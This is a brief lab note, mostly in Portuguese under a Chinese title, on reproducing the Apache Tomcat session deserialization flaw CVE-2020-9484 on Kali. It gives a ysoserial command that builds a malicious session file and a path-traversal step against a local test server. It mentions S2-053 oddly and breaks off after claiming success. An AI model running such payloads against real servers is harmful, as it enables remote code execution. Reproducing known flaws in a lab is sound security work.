
用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞
Reproduzindo a vulnerabilidade de execução de código por desserialização de sessão do Apache Tomcat CVE-2020-9484 com Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Primeiro, acesse S2-053 para verificar se iniciou corretamente:
http://192.168.152.128:8080/s2-053/
Reacesse e capture o pacote, use intruder para fazer path traversal


Comando executado com sucesso:
